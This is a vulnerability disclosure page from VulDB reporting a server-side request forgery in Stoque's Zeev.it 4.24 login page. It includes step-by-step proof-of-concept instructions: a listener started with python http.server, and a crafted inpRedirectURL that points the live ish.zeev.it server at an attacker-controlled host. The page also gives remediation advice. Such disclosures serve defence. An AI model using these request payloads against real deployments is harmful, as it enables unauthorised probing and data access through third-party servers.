Submit #511708: https://stoque.com.br Zeev 4.24 Zeev.it SSRF via inpRedirectURL Parameter on the Login Pageinfo

Titelhttps://stoque.com.br Zeev 4.24 Zeev.it SSRF via inpRedirectURL Parameter on the Login Page
BeschreibungProof of Concept (PoC) - SSRF on Zeev.it (Version 4.24) LINK PoC: https://drive.google.com/file/d/17QAEbzVIjTUj8FDOVMwfl9-7j8LRcK4V/view?usp=sharing About Zeev.it Zeev.it is a business process automation (BPM) platform developed by Stoque (https://stoque.com.br/). It allows the creation and management of workflows in an intuitive way. Used by several organizations to optimize internal processes, the system provides functionalities for task approval, document management and integration with other services. Vulnerability Description The vulnerability identified in the Zeev.it system allows a Server-Side Request Forgery (SSRF) attack through the inpRedirectURL parameter. This allows an attacker to manipulate requests made by the application server, being able to redirect them to external servers under their control. Exploitation Scenario During the analysis of the application, a task for approval was received in the Zeev.it system. The URL provided was: https://vp4mtgxk.r.us-east-1.awstrack.me/L0/https:%2F%2Fish.zeev.it%2Fmy%2Ftasks/1/01000195488f2e53-225aba4a-ac85-4834-a12f-eb153cb5a24c-000000/fn3qgU20a7bgypJyFAQiBonoJ1s=415 After accessing this URL, it was identified that the application redirects to the following endpoint vulnerable: https://domain.zeev.it/login?inpLostSession=1&inpRedirectURL=%2F2.0%2Ftask%3Fc%3DV2L3cAEPruaV76FQ2IrzlEgRiHoLXgqU9lFiu%252bLIBYh%252fdUmaQoUwIXKbXcO%252fSsvc Step-by-Step Exploitation 1. Configure a server to capture SSRF requests. 2. python3 -m http.server 8000 3. Create a malicious URL to force the server to connect to our control server: 4. https://ish.zeev.it/login?inpLostSession=1&inpRedirectURL=http://<YOUR_SERVER>:9000/ 5. Monitor incoming requests: 6. SSRF server running on port 8000... 7. SSRF Detected: x.x.x.x -> /?t=m5g3M3eI9/uHe92X... 8. The attack was also successfully performed using Burp Suite and Burp Collaborator, intercepting and modifying the request to test different domains and endpoints. Impact This vulnerability could allow an attacker to use the application server as a proxy to access other resources, masking their identity and potentially accessing sensitive information. Recommendations • Implement whitelisting to restrict redirects to trusted domains only. • Validate and sanitize user-supplied input to the inpRedirectURL parameter. • Monitor HTTP request logs for potential exploit attempts.
Quelle⚠️ https://ish.zeev.it/login?inpLostSession=1&inpRedirectURL=http://x.x.x.x:8000
Benutzer
 Samuel Jesus (UID 81288)
Einreichung28.02.2025 15:55 (vor 1 Jahr)
Moderieren11.03.2025 07:56 (11 days later)
StatusAkzeptiert
VulDB Eintrag299217 [Stoque Zeev.it 4.24 Login Page /Login?inpLostSession=1 inpRedirectURL erweiterte Rechte]
Punkte20

ZurückÜbersichtWeiter

Interested in the pricing of exploits?

See the underground prices here!